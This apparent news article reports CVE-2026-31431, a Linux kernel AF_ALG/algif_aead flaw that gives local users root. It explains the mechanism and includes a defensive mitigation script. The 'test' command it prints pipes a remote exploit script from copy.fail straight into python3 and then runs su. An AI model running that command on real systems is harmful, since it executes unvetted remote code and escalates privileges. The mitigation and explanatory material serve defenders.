Linux exploit instantly grants administrator access on most distributions since 2017 — cryptography optimization snafu grants root privileges to local users
It is quite an interesting patch week for Linux systems administrators out there. Researchers at Xint Code have discovered a nasty exploit that instantly grants root access to any local unprivileged user, a nightmare scenario for multi-user servers of various types, including web servers, container environments like Kubernetes, CI/CD pipelines, and more.
The CVE-2026-31431 exploit affects pretty much every Linux distro currently in use, and the underlying bug has existed since 2017. Although it's not a zero-day and the kernel has already gotten a patch, the short disclosure window gave distro makers relatively little time to react. Affected variants include (but aren't limited to) Ubuntu 24 (version 26 was just released last week), RHEL 10, Suse 16, and Amazon Linux 2023. Even Windows' WSL2 is affected, and all it takes is 732 bytes to do it.
To check whether a system is vulnerable, you can just run "curl https://copy.fail/exp | python3 && su" from a standard unprivileged account, though we should note that you're trusting an online script. The source code for the proof-of-concept is available here if you prefer. If your distro doesn't have a patch available yet, you can try one of two mitigation methods.
If your kernel loads algif_aead as a module, a simple "echo 'install algif_aead /bin/false' > /etc/modprobe.d/disable-algif.conf" will suffice. Some distributions, however, compile that functionality right into the kernel core, including RHEL and WSL2. In those cases, you'll have to resort to disallowing users from opening AF_ALG sockets in the first place, via seccomp profiles, AppArmor, or SELinux.
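The two mitigation paths above depend on one question: is algif_aead a loadable module on this kernel, or is it built in? The following shell script, an added example that is not part of the article or of the Xint Code research, answers that question and applies the modprobe-side mitigation where it is possible. It reads the kernel's modules.builtin list and an lsmod dump from paths passed as parameters (so the logic can be exercised against constructed sample files), and only touches the real system when ALGIF_CHECK_LIVE is set. The function names, the ALGIF_CHECK_LIVE variable and the output directory parameter are this example's own conventions, not something the article or any distro defines.

```shell
#!/bin/sh
# Added example (not from the article): decide how this kernel provides
# algif_aead and emit the matching CVE-2026-31431 mitigation.

# classify_algif_aead BUILTIN_LIST LSMOD_OUTPUT
# Prints one of: builtin | loaded | not_loaded
#   builtin    -> compiled into vmlinux (e.g. RHEL, WSL2); modprobe.d cannot help,
#                 restrict AF_ALG with seccomp / AppArmor / SELinux instead.
#   loaded     -> module currently loaded; blacklist it AND unload it.
#   not_loaded -> module not loaded now, but the kernel autoloads it on first
#                 AF_ALG "aead" bind, so the install directive is still needed.
classify_algif_aead() {
    builtin_list=$1   # normally /lib/modules/$(uname -r)/modules.builtin
    lsmod_out=$2      # captured output of lsmod
    if grep -q '/algif_aead\.ko$' "$builtin_list" 2>/dev/null; then
        echo builtin
    elif grep -q '^algif_aead[[:space:]]' "$lsmod_out" 2>/dev/null; then
        echo loaded
    else
        echo not_loaded
    fi
}

# write_modprobe_conf DIR
# Writes the "install ... /bin/false" directive from the article into
# DIR/disable-algif.conf. "install" (rather than "blacklist") is used because
# it also defeats explicit and alias-driven loads, not just autoloading.
write_modprobe_conf() {
    dir=$1
    printf 'install algif_aead /bin/false\n' > "$dir/disable-algif.conf"
}

# mitigation_for STATE
# Prints the next action an administrator should take for a given state.
mitigation_for() {
    case $1 in
        builtin)    echo "algif_aead is built in: block AF_ALG sockets via seccomp/AppArmor/SELinux" ;;
        loaded)     echo "write modprobe.d directive, then: modprobe -r algif_aead" ;;
        not_loaded) echo "write modprobe.d directive (module would otherwise autoload)" ;;
        *)          echo "unknown state: $1"; return 1 ;;
    esac
}

# Live run against the real system; requires root to write /etc/modprobe.d.
main_live() {
    builtin_list="/lib/modules/$(uname -r)/modules.builtin"
    lsmod_dump=$(mktemp)
    lsmod > "$lsmod_dump" 2>/dev/null || : > "$lsmod_dump"
    state=$(classify_algif_aead "$builtin_list" "$lsmod_dump")
    rm -f "$lsmod_dump"
    echo "algif_aead state: $state"
    echo "action: $(mitigation_for "$state")"
    if [ "$state" != builtin ]; then
        write_modprobe_conf /etc/modprobe.d && echo "wrote /etc/modprobe.d/disable-algif.conf"
    fi
}

if [ -n "${ALGIF_CHECK_LIVE:-}" ]; then
    main_live
fi
```

Run it as root with ALGIF_CHECK_LIVE=1 to apply the directive; without that variable the functions can be sourced and fed sample files. Note that the modprobe.d directive only affects future loads, so on a system where the module is already loaded it has to be unloaded as well, and on a kernel that reports "builtin" the script deliberately writes nothing, since the only option there is restricting AF_ALG socket creation with an LSM or seccomp policy as the article describes.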
Although the Xint Code security team didn't provide a rationale for publicly disclosing the vulnerability so early, they did mention that they found it with the help of an AI assistant. Given that the source code for the Linux kernel is by definition public, in theory, any serious attacker would find it just as easily. Perhaps the fast reveal was an unfortunate necessity.
As for the exploit mechanism itself, it's fairly devious. AF_ALG is a socket family that an application can use to have data encrypted or decrypted by the kernel, providing the data to be processed along with an authentication tag. To perform the attack, you provide a splice of an executable you have access to as the tag, the most obvious one being "su".
The "algif_aead" kernel code, crucially, has an internal optimization that doesn't copy the input data into a scratch buffer and copy the result back; rather, it chains the tag data directly onto the output buffer by reference. Coincidentally, the "authencesn" encryption algorithm writes 4 bytes at a fixed offset in its output buffer. Since the tag you spliced, the page data for "su", is now part of that output, those bytes get written directly into the kernel's cached copy of the executable.
When you run the executable, it'll be joyfully corrupted, granting administrator access. This all happens in memory, too, so there are no detectable disk writes, and the exploit will also get past many security suites.
Bruno Ferreira is a contributing writer for Tom's Hardware. He has decades of experience with PC hardware and assorted sundries, alongside a career as a developer. He's obsessed with detail and has a tendency to ramble on the topics he loves. When not doing that, he's usually playing games, or at live music shows and festivals.